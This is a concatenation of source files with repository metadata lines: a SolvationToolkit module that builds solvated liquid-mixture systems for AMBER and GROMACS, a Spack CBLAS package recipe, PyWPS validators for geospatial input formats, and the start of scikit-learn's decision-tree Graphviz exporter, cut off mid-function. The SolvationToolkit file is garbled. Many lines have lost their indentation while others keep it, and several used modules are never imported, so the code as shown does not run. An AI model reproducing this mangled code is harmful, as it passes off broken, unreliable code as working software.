import openmoltools
import solvationtoolkit.mol2tosdf as mol2tosdf
from openeye.oechem import *
from openeye.oeiupac import *
from simtk.unit import *
# We require at least ParmEd 2.5.1 because of issues with the .mol2 writer (issue #691 on ParmEd) prior to that, and 2.5.1.10 because of OpenEye reader formatting bugs requiring compressed spacing in .mol2 files (added in ParmEd 2.5.1.10)
# Previously 2.0.4 or later was required due to issues with FudgeLJ/FudgeQQ in resulting GROMACS topologies in
# earlier versions
try: #Try to get version tag
ver = parmed.version
except: #If too old for version tag, it is too old
    oldParmEd = Exception('ERROR: ParmEd is too old, please upgrade to 2.5.1.10 or later')
    raise oldParmEd
if ver < (2,5,1,10):
    raise RuntimeError("ParmEd is too old, please upgrade to 2.5.1.10 or later")
def make_path(pathname):
try:
os.makedirs(pathname)
    except OSError:
        # The directory most likely exists already; ignore.
        pass
class MixtureSystem(object):
"""A pipeline for simulating liquid mixtures using amber and gromacs parameter files.
Limitations
-----------
Existing files with the same name present in the data directory tree may be overwritten.
This results in a limitation/failure in a small (and probably random) fraction of cases
if multiple systems involving the same monomers are written into the same data directory.
Specifically, openmoltools.amber.build_mixture_prmtop requires that each mol2 file for a
component have a unique residue name, which is handled automatically by openmoltools when
constructing monomers (each is assigned a unique random residue name). However, if these
are overwritten with other monomers (i.e. if we set up, say, 'octanol' in the same directory twice)
which by chance end up with non-unique residue names then amber.build_mixture_prmtop will
fail with a ValueError. This can be avoided by ensuring that if you are constructing multiple
MixtureSystems involving the same monomers, your data directories are different.
This issue also will likely be fixed when openmoltools switches to topology merging
via ParmEd rather than tleap, as unique residue names are built into ParmEd in a better way.
"""
def __init__(self, directory='data'):
"""
Initialization of the Molecule Database Class
Parameters
----------
directory : str
the directory name used to save the data
"""
# Set directory names
self.data_path = directory
self.data_path_monomers = os.path.join(self.data_path,'monomers')
self.data_path_packmol = os.path.join(self.data_path,'packmol_boxes')
self.data_path_amber = os.path.join(self.data_path,'amber')
self.data_path_gromacs = os.path.join(self.data_path,'gromacs')
# List container of all the added components to the solution
self.component_list = []
# List of all the smile strings
self.smile_strings = []
# List of all the number of monomers
self.n_monomers = []
# List of all the mole fractions
self.mole_fractions = []
        # List of all the effective compound names. If the compound name is None
        # then the compound label will be used in this list as the compound name
self.labels = []
# The filling compound is a compound with None molecule number and None
# mole fraction. It is used to fill out the solution
self.filling_compound = None
# Lists of filenames related to gaff mol2 files, amber files and sdf file format
self.gaff_mol2_filenames = []
self.frcmod_filenames = []
self.inpcrd_filenames = []
self.prmtop_filenames = []
self.sdf_filenames = []
        # Useful strings used to concatenate the previous lists of filenames
self.mix_fname = ''
self.pdb_filename = ''
self.prmtop_filename = ''
self.inpcrd_filename = ''
self.top_filename = ''
self.gro_filename = ''
# Index used to perform index selection by using __iter__ function
self.__ci = 0
return
def __str__(self):
"""
Printing object function
"""
string = ''
for i in self.component_list:
string = string + str(i)
return string
def __iter__(self):
"""
Index generator
"""
return self
def next(self): # Python 3: def __next__(self)
"""
Select the molecule during an iteration
"""
if self.__ci > len(self.component_list) - 1:
self.__ci = 0
raise StopIteration
else:
self.__ci = self.__ci + 1
return self.component_list[self.__ci - 1]
def __getitem__(self, index):
"""
Index selection function
"""
return self.component_list[index]
def __setitem__(self, index, component):
"""
Index setting function
Parameters
----------
index : int
the component index
component : Component obj
the component to assign to the component in the mixture
MixtureSystem[index] = component
"""
if not isinstance(component, Component):
raise ValueError('The passed component is not a Component class object')
self.component_list[index] = component
def addComponent(self, name=None, **args):
"""
        Add a component to the solution
Parameters
----------
name : string
            the name of the compound to add to the solution
**args : see class Component for a full description
"""
# Component object creation
component=Component(name, **args)
        # Add the object to the component list
self.component_list.append(component)
def build(self, amber=False, gromacs=False, solute_index='auto'):
"""
Build all the monomers and the amber or gromacs mixture files
Parameters
----------
amber : bool
this flag is used to control if output or not the amber files
gromacs : bool
this flag is used to control if output or not the gromacs files
solute_index : int/str, optional. Default: "auto"
Optional parameter to specify which of the components (in the list of specified components)
will be treated as a solute in constructing GROMACS topology files
(which means that a single molecule of this component will be singled out as the 'solute'
in the resulting GROMACS topology file). Valid options are 'auto'
(pick the first component present with n_monomers = 1,
otherwise the first component), None (don't pick any), or an integer
            (pick the component smile_strings[solute_index]).
"""
def build_monomers(self):
"""
Generate GAFF mol2 and frcmod files for each chemical
"""
# Filenames generation
for comp in self.component_list:
if comp.label:
mol2_filename = os.path.join(self.data_path_monomers, comp.label+'.mol2')
frcmod_filename = os.path.join(self.data_path_monomers, comp.label+'.frcmod')
inpcrd_filename = os.path.join(self.data_path_monomers, comp.label+'.inpcrd')
prmtop_filename = os.path.join(self.data_path_monomers, comp.label+'.prmtop')
sdf_filename = os.path.join(self.data_path_monomers, comp.label+'.sdf')
self.mix_fname = self.mix_fname + '_' + comp.label
else:
mol2_filename = os.path.join(self.data_path_monomers, comp.name+'.mol2')
frcmod_filename = os.path.join(self.data_path_monomers, comp.name+'.frcmod')
inpcrd_filename = os.path.join(self.data_path_monomers, comp.name+'.inpcrd')
prmtop_filename = os.path.join(self.data_path_monomers, comp.name+'.prmtop')
sdf_filename = os.path.join(self.data_path_monomers, comp.name+'.sdf')
self.mix_fname = self.mix_fname + '_' + comp.name
# Filling compound selection
                if comp.numbers is None and comp.mole_fraction is None:
                    if self.filling_compound is None:
                        self.filling_compound = comp
                        self.mole_fractions.append(comp.mole_fraction)
                    else:
                        raise ValueError('Error: Two or more filling compounds have been specified')
# Number and mol fractions lists generation
if comp.numbers:
self.n_monomers.append(comp.numbers)
if comp.mole_fraction is not None:
self.mole_fractions.append(comp.mole_fraction)
# Lists of filenames generation
self.smile_strings.append(comp.smile)
self.gaff_mol2_filenames.append(mol2_filename)
self.frcmod_filenames.append(frcmod_filename)
self.inpcrd_filenames.append(inpcrd_filename)
self.prmtop_filenames.append(prmtop_filename)
self.sdf_filenames.append(sdf_filename)
if not (os.path.exists(mol2_filename) and os.path.exists(frcmod_filename)):
#Convert SMILES strings to mol2 and frcmod files for antechamber
openmoltools.openeye.smiles_to_antechamber(comp.smile, mol2_filename, frcmod_filename)
#Correct the mol2 file partial atom charges to have a total net integer molecule charge
mol2f = parmed.formats.Mol2File
mol2f.write(parmed.load_file(mol2_filename).fix_charges(),mol2_filename, compress_whitespace=True)
#Generate amber coordinate and topology files for the unsolvated molecules
mol_name = os.path.basename(mol2_filename).split('.')[0]
openmoltools.amber.run_tleap(mol_name, mol2_filename, frcmod_filename, prmtop_filename, inpcrd_filename)
#Read Mol2 File and write SDF file
mol2tosdf.writeSDF(mol2_filename, sdf_filename, mol_name)
#Generate unique residue names for molecules in mol2 files
openmoltools.utils.randomize_mol2_residue_names(self.gaff_mol2_filenames)
def build_boxes(self):
"""
Build an initial box with packmol and use it to generate AMBER files
"""
def mole_fractions_to_n_monomers(self, density= 1 * grams/milliliter, cutoff=12*angstrom):
"""
This function is used to generate the number of molecules for each compound
in the solution from the mole fractions of each molecule.
Parameters
----------
density : openmm units
the solution density
cutoff : openmm units
the cutoff distance of the largest compound in the solution
Returns
-------
self.n_monomers : integer list
the list of molecule number for each compound in the solution
                size : float
                    the edge length of the cubic box
"""
# Calculate the maximum atomic distance in a molecule
def max_dist_mol(mol):
max_dist = 0.0
coords = mol.GetCoords() # Are the coords always in A in mol2 file?
for i in range(0, mol.NumAtoms()):
crdi = np.array([coords[i][0], coords[i][1], coords[i][2]])
for j in range(i+1, mol.NumAtoms()):
crdj = np.array([coords[j][0], coords[j][1], coords[j][2]])
dist = np.linalg.norm(crdi-crdj)
if dist > max_dist:
max_dist = dist
return max_dist * angstrom
# The sum of all the mole fractions
                sum_fractions = sum([i for i in self.mole_fractions if i is not None])
if sum_fractions > 1.0:
raise ValueError('Error: The total molar fraction is greater than 1.0')
if sum_fractions == 1.0 and self.filling_compound:
raise ValueError('Error: The total molar fraction is 1.0 and it is not possible to add any filling compound to the solution')
if sum_fractions < 1.0 and not self.filling_compound:
                    raise ValueError('Error: The total molar fraction is less than 1.0 and the filling compound is missing')
if self.filling_compound:
self.filling_compound.mole_fraction = 1.0 - sum_fractions
                    self.mole_fractions = [i if i is not None else (1.0 - sum_fractions) for i in self.mole_fractions]
max_dist_mols = 0.0 * angstrom
delta_volume = 0.0 * angstrom**3
sum_wgt_frac = 0.0 * grams/mole
for i in range(0, len(self.sdf_filenames)):
                    istream = oemolistream(self.sdf_filenames[i])  # gaff mol2 files give the wrong weight because they are not in SYBYL format
mol = oechem.OEMol()
if not OEReadMolecule(istream, mol):
raise IOError('Error: It was not possible to create the OpenEye molecule object reading the file: %s' % self.gaff_mol2_filenames[i])
# Molecular weight
wgt = oechem.OECalculateMolecularWeight(mol) * grams/mole
if self.component_list[i].mole_fraction == 0.0:
delta_volume = oechem.OECalculateMolecularWeight(mol) * angstrom**3
sum_wgt_frac = sum_wgt_frac + wgt * self.component_list[i].mole_fraction
max_dist= max_dist_mol(mol)
if max_dist > max_dist_mols:
max_dist_mols = max_dist
cube_length = ((max_dist_mols + 2*cutoff)**3 + delta_volume)**(1.0/3.0)
n_monomers = []
# n_i = Volume * Density * mole_fraction_i/sum_j(wgt_j * mole_fraction_j)
self.n_monomers = [int(round(AVOGADRO_CONSTANT_NA * comp.mole_fraction * density * cube_length**3 / sum_wgt_frac)) \
if comp.mole_fraction !=0 else 1 for comp in self.component_list]
return self.n_monomers, cube_length
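            # Worked sketch (illustrative numbers, not from the original code):
            # for a 50/50 water/ethanol mixture (wgt ~18 and ~46 g/mol),
            # sum_wgt_frac ~ 32 g/mol, so a 40 A cube at 1 g/mL gives roughly
            #   n_i ~ N_A * 0.5 * (40 A)^3 * 1 g/mL / 32 g/mol ~ 600
            # molecules of each component before rounding.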
if not self.gaff_mol2_filenames:
raise ValueError('The list of gaff mol2 molecules is empty')
if self.n_monomers and self.mole_fractions:
raise ValueError('Error: For different compounds it is not possible to mix mole_fractions and number of molecules')
# The solution has been specified by using number of molecules
if self.n_monomers:
if self.filling_compound:
raise ValueError('Error: The filling compound cannot be mixed with components specified by defining the number of molecules')
size = openmoltools.packmol.approximate_volume_by_density(self.smile_strings, self.n_monomers)
packed_trj = openmoltools.packmol.pack_box([md.load(mol2) for mol2 in self.gaff_mol2_filenames], self.n_monomers, box_size = size)
self.labels = self.mix_fname[1:].split('_')
self.mix_fname = self.mix_fname[1:] + ''.join(['_'+str(i) for i in self.n_monomers])
self.pdb_filename = os.path.join(self.data_path_packmol, self.mix_fname+'.pdb')
packed_trj.save(self.pdb_filename)
# The solutions has been specified by using mole fractions
elif self.mole_fractions:
n_monomers, size = mole_fractions_to_n_monomers(self)
                # WARNING: The size estimated with the mole_fractions_to_n_monomers function underestimates
                # the volume calculated by using openmoltools, so for now we use the openmoltools estimate.
                # Apparently Packmol struggles to find convergence and introduces extra molecules
                # into the best solution found (bug?)
size = openmoltools.packmol.approximate_volume_by_density(self.smile_strings, self.n_monomers)
packed_trj = openmoltools.packmol.pack_box([md.load(mol2) for mol2 in self.gaff_mol2_filenames], n_monomers, box_size = size)
#packed_trj = openmoltools.packmol.pack_box([md.load(mol2) for mol2 in self.gaff_mol2_filenames], n_monomers, box_size = size/anstrom)
self.labels = self.mix_fname[1:].split('_')
self.mix_fname = self.mix_fname[1:] +''.join(['_'+str(i) for i in self.mole_fractions if i is not None])
self.pdb_filename = os.path.join(self.data_path_packmol, self.mix_fname+'.pdb')
packed_trj.save(self.pdb_filename)
return
def convert_to_gromacs(self, solute_index):
"""From AMBER-format prmtop and crd files, generate final solvated GROMACS topology and coordinate files. Ensure that the desired "solute" (as per solute_index) has a single monomer treated via a unique residue name to allow treatment as a solute separate from other residues of the same name (if desired). The solute will be given residue name "solute" Also, check to see if there are "WAT" residues present, in which case tleap will have re-ordered them to the end of the data file. If so, update data structures accordingly and handle conversion appropriately.
Notes
-----
Currently, this function ensures that - after AMBER conversion reorders water molecules with residue names 'WAT' to occur last in the resulting parameter/coordinate files - the internal data structures are updated to have the correct order in the relevant lists (labels, smiles_strings, n_monomers). If for some reason GROMACS conversion were removed, these would need to be updated elsewhere. (Probably this should be done anyway, as this is not really a GROMACS issue.)
"""
# Read in AMBER format parameter/coordinate file and convert in gromacs
gromacs_topology = parmed.load_file(self.prmtop_filename, self.inpcrd_filename )
# Split the topology into components and check that we have the right number of components
components = gromacs_topology.split()
assert len(components)==len(self.n_monomers), "Number of monomers and number of components in the combined topology do not match."
#### HANDLE ORDERING OF WATER ####
# Check if any of the residues is named "WAT". If it is, antechamber will potentially have re-ordered it from where it was (it places residues named "WAT" at the end) so it may no longer appear in the order in which we expect.
resnames = [ components[i][0].residues[0].name for i in range(len(components)) ]
wat_present = False
# Manage presence of WAT residues and possible re-ordering
if 'WAT' in resnames:
# If there is a water present, then we MIGHT have re-ordering. Check smiles to find out where it was originally.
wat_orig_index = self.smile_strings.index('O')
# Where is it now?
wat_new_index = resnames.index('WAT')
# Reordered? If so, we have to adjust the ordering of n_monomers, smiles_strings, labels,
# and potentially solute_index. Filenames will be preserved since these were already created
if wat_orig_index != wat_new_index:
# tleap moves water to the end so if they aren't equal, we know where water will be...
self.n_monomers = self.n_monomers[0:wat_orig_index] + self.n_monomers[wat_orig_index+1:] + [self.n_monomers[wat_orig_index]]
self.smile_strings = self.smile_strings[0:wat_orig_index] + self.smile_strings[wat_orig_index+1:] + [self.smile_strings[wat_orig_index]]
self.labels = self.labels[0:wat_orig_index] + self.labels[wat_orig_index+1:] + [self.labels[wat_orig_index] ]
# Check solute_index and alter if needed
                if solute_index != 'auto' and solute_index is not None:
# Index unchanged if it's before the water
if solute_index < wat_orig_index:
pass
# If it is the water, now it is at the end
elif solute_index == wat_orig_index:
solute_index = len(self.n_monomers)-1
# If it was after the water, then it moved up one position
else:
solute_index -= 1
#### END HANDLING OF ORDERING OF WATER ####
# Figure out what we're treating as the solute (if anything)
            if solute_index == 'auto':
# Check which of the molecules is present in qty 1
try:
solute_index = self.n_monomers.index(1)
except ValueError:
# If none is present in qty 1, then use the first
solute_index = 0
            # Check that the passed solute index is correct
            check_solute_indices = range(0, len(self.n_monomers))
            assert (solute_index in check_solute_indices and isinstance(solute_index, int)) or solute_index is None, \
                "Solute index must be an element of the list: %s or None. The value passed is: %s" % (check_solute_indices, solute_index)
# Now all we have to do is to change the name of the solute molecule (residue, in ParmEd) and ParmEd will automatically make it a new molecule on write.
# To do this, first build a list of the residue names we want, by molecule
resnames = [ ]
for i in range(len(self.n_monomers)):
# If this is not the solute, just keep what we had
if i!=solute_index:
resnames += [ self.labels[i] ] * self.n_monomers[i]
# If it is the solute, make the first residue be named solute and the rest what they were already
else:
resnames += [ 'solute' ] + [ self.labels[i]] * (self.n_monomers[i]-1)
# Make sure we didn't botch this
assert len(resnames) == len( gromacs_topology.residues ), "Must have the same number of residues named as defined in the topology file."
# Now we just go through and rename all the residues and we're done
for i in range(len(resnames)):
gromacs_topology.residues[i].name = resnames[i]
# Write GROMACS topology/coordinate files
gromacs_topology.save(self.top_filename, format='gromacs')
gromacs_topology.save(self.gro_filename)
return
# Create monomers and packmol directories
make_path(os.path.join(self.data_path_monomers))
make_path(os.path.join(self.data_path_packmol))
# Call the monomers creation and packmol systems
build_monomers(self)
build_boxes(self)
# Create amber files
if amber:
make_path(os.path.join(self.data_path_amber))
self.prmtop_filename = os.path.join(self.data_path_amber, self.mix_fname+'.prmtop')
self.inpcrd_filename = os.path.join(self.data_path_amber, self.mix_fname+'.inpcrd')
tleap_cmd = openmoltools.amber.build_mixture_prmtop(self.gaff_mol2_filenames, self.frcmod_filenames, self.pdb_filename, self.prmtop_filename, self.inpcrd_filename)
# Create gromacs files
if gromacs:
make_path(os.path.join(self.data_path_gromacs))
self.top_filename = os.path.join(self.data_path_gromacs, self.mix_fname+'.top')
self.gro_filename = os.path.join(self.data_path_gromacs, self.mix_fname+'.gro')
convert_to_gromacs(self,solute_index)
#*************************
# Component Class
#*************************
class Component(object):
"""
    This class is used to store the component parameters
"""
def __init__(self, name=None, label=None, smile=None, numbers=None, mole_fraction=None):
"""
Initialization class function
Parameters
----------
name : str
the molecule name
label : str
the molecule label used to generates files
smile : str
the molecule smile string
numbers : int
the number of molecule
mole_fraction : float
molecular mole fraction
"""
# Checking name and label
ref_str = ''
if not name and not label:
raise ValueError("Error: No component parameters name or label has been provided for the component")
if label:
if not isinstance(label, str):
raise ValueError("Error: The component label %s is not a string" % label)
ref_str = label
if name:
if not isinstance(name, str):
raise ValueError("Error: The component name %s is not a string" % name)
ref_str = name
if label and not name:
            print('\nWARNING: component name not provided; label will be used as component name\n')
# Checking smile, molecule numbers and mole fraction
if smile:
if not isinstance(smile, str):
raise ValueError("Error: The smile % for the component %s is not a string" % (smile, ref_str))
#TO DO: Check if a string is a valid smile string
if numbers is not None:
if not isinstance(numbers, int):
raise ValueError("Error: The molecule numbers %s for the component %s is not an integer" % (numbers, ref_str))
if numbers < 1:
raise ValueError("Error: The molecule numbers %s for the component %s must be a positive integer" % (numbers, ref_str))
        if mole_fraction is not None:
if not isinstance(mole_fraction, float):
raise ValueError("Error: The mole fraction %s for the component %s is not a float number" % (mole_fraction, ref_str))
if mole_fraction < 0.0:
raise ValueError("Error: The mole fraction %s for the component %s must be positive" % (mole_fraction, ref_str))
if mole_fraction > 1.0:
raise ValueError("Error: The mole fraction %s for the component %s is greater than one" % (mole_fraction, ref_str))
        if numbers is not None and mole_fraction is not None:
raise ValueError("Error: molecule numbers and mole fraction for the compound %s cannot be both specified" % ref_str)
if not smile:
mol = OEMol()
if name:
try:
OEParseIUPACName(mol, name)
smile = OECreateIsoSmiString(mol)
except:
raise ValueError("Error: The supplied name '%s' could not be parsed" % name)
elif label:
try:
OEParseIUPACName(mol, label)
smile = OECreateIsoSmiString(mol)
except:
raise ValueError("Error: The supplied label '%s' could not be parsed" % label)
self.name = name
self.label = label
self.smile = smile
self.numbers = numbers
self.mole_fraction = mole_fraction
return
def __str__(self):
"""
Printing object function
"""
return "\nname = %s\nlabel = %s\nsmile = %s\nnumbers = %s\nmole_frac = %s\n" \
%(self.name, self.label, self.smile, self.numbers, self.mole_fraction)
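# Usage sketch (illustrative, not part of the original file): build a
# water/ethanol box and write GROMACS files, treating ethanol as the solute.
#   mixture = MixtureSystem('data')
#   mixture.addComponent(name='water', mole_fraction=0.5)
#   mixture.addComponent(name='ethanol')  # filling compound
#   mixture.build(gromacs=True, solute_index=1)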
|
nividic/SolvationToolkit
|
solvationtoolkit/solvated_mixtures.py
|
Python
|
lgpl-2.1
| 30,218
|
[
"Amber",
"Gromacs",
"MDTraj",
"OpenMM"
] |
bc549487400c97e7bef19f03847e477c644705c4768f2efb9394850cd16966c3
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Cblas(Package):
"""The BLAS (Basic Linear Algebra Subprograms) are routines that
provide standard building blocks for performing basic vector and
matrix operations."""
homepage = "http://www.netlib.org/blas/_cblas/"
    # tarball has no version, but on the date below, this sha256 was correct.
version('2015-06-06', sha256='0f6354fd67fabd909baf57ced2ef84e962db58fae126e4f41b21dd4fec60a2a3',
url='https://www.netlib.org/blas/blast-forum/cblas.tgz')
depends_on('blas')
parallel = False
def patch(self):
mf = FileFilter('Makefile.in')
mf.filter('^BLLIB =.*', 'BLLIB = {0}'.format(
' '.join(self.spec['blas'].libs.libraries)))
mf.filter('^CC =.*', 'CC = cc')
mf.filter('^FC =.*', 'FC = fc')
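    # Illustrative effect of the filters above (hypothetical paths): the
    # patched Makefile.in would read, e.g.,
    #   BLLIB = /path/to/libopenblas.a
    #   CC = cc
    #   FC = fc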
def install(self, spec, prefix):
make('all')
mkdirp(prefix.lib)
mkdirp(prefix.include)
# Rename the generated lib file to libcblas.a
install('lib/cblas_LINUX.a', prefix.lib.join('libcblas.a'))
install('include/cblas.h', prefix.include)
install('include/cblas_f77.h', prefix.include)
|
LLNL/spack
|
var/spack/repos/builtin/packages/cblas/package.py
|
Python
|
lgpl-2.1
| 1,360
|
[
"BLAST"
] |
641dec226b8f6fc2037a703984c23575c829513f14966aeb339fe184330afce9
|
##################################################################
# Copyright 2018 Open Source Geospatial Foundation and others #
# licensed under MIT, Please consult LICENSE.txt for details #
##################################################################
"""Validator classes are used for ComplexInputs, to validate the content
"""
import logging
from pywps.validator.mode import MODE
from pywps.inout.formats import FORMATS
import mimetypes
import os
LOGGER = logging.getLogger('PYWPS')
def validategml(data_input, mode):
"""GML validation function
:param data_input: :class:`ComplexInput`
:param pywps.validator.mode.MODE mode:
    This function validates GML input based on the given validation mode. The
    following happens, depending on the `mode` parameter:
`MODE.NONE`
it will return always `True`
`MODE.SIMPLE`
the mimetype will be checked
`MODE.STRICT`
`GDAL/OGR <http://gdal.org/>`_ is used for getting the proper format.
`MODE.VERYSTRICT`
the :class:`lxml.etree` is used along with given input `schema` and the
GML file is properly validated against given schema.
"""
LOGGER.info('validating GML; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.GML.mime_type}
if mode >= MODE.STRICT:
from pywps.dependencies import ogr
data_source = ogr.Open(data_input.file)
if data_source:
passed = (data_source.GetDriver().GetName() == "GML")
else:
passed = False
if mode >= MODE.VERYSTRICT:
from lxml import etree
from pywps._compat import PY2
if PY2:
from urllib2 import urlopen
else:
from urllib.request import urlopen
try:
schema_url = data_input.data_format.schema
gmlschema_doc = etree.parse(urlopen(schema_url))
gmlschema = etree.XMLSchema(gmlschema_doc)
passed = gmlschema.validate(etree.parse(data_input.stream))
except Exception as e:
LOGGER.warning(e)
passed = False
return passed
def validatejson(data_input, mode):
"""JSON validation function
:param data_input: :class:`ComplexInput`
:param pywps.validator.mode.MODE mode:
    This function validates JSON input based on the given validation mode. The
    following happens, depending on the `mode` parameter:
`MODE.NONE`
No validation, returns `True`.
`MODE.SIMPLE`
Returns `True` if the mime type is correct.
`MODE.STRICT`
Returns `True` if the content can be interpreted as a json object.
"""
LOGGER.info('validating JSON; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.JSON.mime_type}
if mode >= MODE.STRICT:
import json
try:
with open(data_input.file) as f:
json.load(f)
passed = True
except ValueError:
passed = False
return passed
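# Usage sketch (illustrative): given a ComplexInput whose `file` points at a
# JSON document, escalating the mode tightens the check:
#   validatejson(json_input, MODE.NONE)    # always True
#   validatejson(json_input, MODE.SIMPLE)  # mime-type check only
#   validatejson(json_input, MODE.STRICT)  # content must parse as JSON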
def validategeojson(data_input, mode):
"""GeoJSON validation example
>>> import StringIO
>>> class FakeInput(object):
... json = open('point.geojson','w')
... json.write('''{"type":"Feature", "properties":{}, "geometry":{"type":"Point", "coordinates":[8.5781228542328, 22.87500500679]}, "crs":{"type":"name", "properties":{"name":"urn:ogc:def:crs:OGC:1.3:CRS84"}}}''') # noqa
... json.close()
... file = 'point.geojson'
>>> class fake_data_format(object):
    ...     mime_type = 'application/geojson'
>>> fake_input = FakeInput()
>>> fake_input.data_format = fake_data_format()
>>> validategeojson(fake_input, MODE.SIMPLE)
True
"""
LOGGER.info('validating GeoJSON; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.GEOJSON.mime_type}
if mode >= MODE.STRICT:
from pywps.dependencies import ogr
data_source = ogr.Open(data_input.file)
if data_source:
passed = (data_source.GetDriver().GetName() == "GeoJSON")
else:
passed = False
if mode >= MODE.VERYSTRICT:
import jsonschema
import json
# this code comes from
# https://github.com/om-henners/GeoJSON_Validation/blob/master/geojsonvalidation/geojson_validation.py
schema_home = os.path.join(_get_schemas_home(), "geojson")
base_schema = os.path.join(schema_home, "geojson.json")
with open(base_schema) as fh:
geojson_base = json.load(fh)
with open(os.path.join(schema_home, "crs.json")) as fh:
crs_json = json.load(fh)
with open(os.path.join(schema_home, "bbox.json")) as fh:
bbox_json = json.load(fh)
with open(os.path.join(schema_home, "geometry.json")) as fh:
geometry_json = json.load(fh)
cached_json = {
"http://json-schema.org/geojson/crs.json": crs_json,
"http://json-schema.org/geojson/bbox.json": bbox_json,
"http://json-schema.org/geojson/geometry.json": geometry_json
}
resolver = jsonschema.RefResolver(
"http://json-schema.org/geojson/geojson.json",
geojson_base, store=cached_json)
validator = jsonschema.Draft4Validator(geojson_base, resolver=resolver)
try:
validator.validate(json.loads(data_input.stream.read()))
passed = True
except jsonschema.ValidationError:
passed = False
return passed
def validateshapefile(data_input, mode):
"""ESRI Shapefile validation example
"""
LOGGER.info('validating Shapefile; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.SHP.mime_type}
if mode >= MODE.STRICT:
from pywps.dependencies import ogr
import zipfile
z = zipfile.ZipFile(data_input.file)
shape_name = None
for name in z.namelist():
z.extract(name, data_input.tempdir)
if os.path.splitext(name)[1].lower() == '.shp':
shape_name = name
if shape_name:
data_source = ogr.Open(os.path.join(data_input.tempdir, shape_name))
if data_source:
passed = (data_source.GetDriver().GetName() == "ESRI Shapefile")
else:
passed = False
return passed
def validategeotiff(data_input, mode):
"""GeoTIFF validation example
"""
    LOGGER.info('Validating GeoTIFF; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.GEOTIFF.mime_type}
if mode >= MODE.STRICT:
try:
from pywps.dependencies import gdal
data_source = gdal.Open(data_input.file)
passed = (data_source.GetDriver().ShortName == "GTiff")
except ImportError:
passed = False
return passed
def validatenetcdf(data_input, mode):
"""netCDF validation.
"""
LOGGER.info('Validating netCDF; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.NETCDF.mime_type}
if mode >= MODE.STRICT:
try:
from pywps.dependencies import netCDF4 as nc
nc.Dataset(data_input.file)
passed = True
except ImportError as e:
passed = False
LOGGER.exception("ImportError while validating netCDF4 file {}:\n {}".format(data_input.file, e))
except IOError as e:
passed = False
LOGGER.exception("IOError while validating netCDF4 file {}:\n {}".format(data_input.file, e))
return passed
def validatedods(data_input, mode):
"""OPeNDAP validation.
"""
LOGGER.info('Validating OPeNDAP; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.url
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.DODS.mime_type}
if mode >= MODE.STRICT:
try:
from pywps.dependencies import netCDF4 as nc
nc.Dataset(data_input.url)
passed = True
except ImportError as e:
passed = False
LOGGER.exception("ImportError while validating OPeNDAP link {}:\n {}".format(data_input.url, e))
except IOError as e:
passed = False
LOGGER.exception("IOError while validating OPeNDAP link {}:\n {}".format(data_input.url, e))
return passed
def _get_schemas_home():
"""Get path to schemas directory
"""
schema_dir = os.path.join(
os.path.abspath(
os.path.dirname(__file__)
),
os.path.pardir,
"schemas")
LOGGER.debug('Schemas directory: {}'.format(schema_dir))
return schema_dir
if __name__ == "__main__":
import doctest
from pywps.wpsserver import temp_dir
with temp_dir() as tmp:
os.chdir(tmp)
doctest.testmod()
|
tomkralidis/pywps
|
pywps/validator/complexvalidator.py
|
Python
|
mit
| 10,267
|
[
"NetCDF"
] |
11f96e3c046eb673c161ee704a92cd97d56eda26cdee691df274931ff9004921
|
"""
This module defines export functions for decision trees.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Noel Dawe <noel@dawe.me>
# Satrajit Gosh <satrajit.ghosh@gmail.com>
# Licence: BSD 3 clause
from warnings import warn
from ..externals import six
from . import _tree
def export_graphviz(decision_tree, out_file="tree.dot", feature_names=None,
max_depth=None, close=None):
"""Export a decision tree in DOT format.
This function generates a GraphViz representation of the decision tree,
which is then written into `out_file`. Once exported, graphical renderings
can be generated using, for example::
$ dot -Tps tree.dot -o tree.ps (PostScript format)
$ dot -Tpng tree.dot -o tree.png (PNG format)
Parameters
----------
decision_tree : decision tree classifier
The decision tree to be exported to GraphViz.
out_file : file object or string, optional (default="tree.dot")
Handle or name of the output file.
feature_names : list of strings, optional (default=None)
Names of each of the features.
max_depth : int, optional (default=None)
The maximum depth of the representation. If None, the tree is fully
generated.
Examples
--------
>>> import os
>>> from sklearn.datasets import load_iris
>>> from sklearn import tree
>>> clf = tree.DecisionTreeClassifier()
>>> iris = load_iris()
>>> clf = clf.fit(iris.data, iris.target)
>>> tree.export_graphviz(clf,
... out_file='tree.dot') # doctest: +SKIP
"""
if close is not None:
warn("The close parameter is deprecated as of version 0.14 "
"and will be removed in 0.16.", DeprecationWarning)
def node_to_str(tree, node_id):
value = tree.value[node_id]
if tree.n_outputs == 1:
value = value[0, :]
if isinstance(tree.splitter.criterion, _tree.Gini):
criterion = "gini"
elif isinstance(tree.splitter.criterion, _tree.Entropy):
criterion = "entropy"
elif isinstance(tree.splitter.criterion, _tree.MSE):
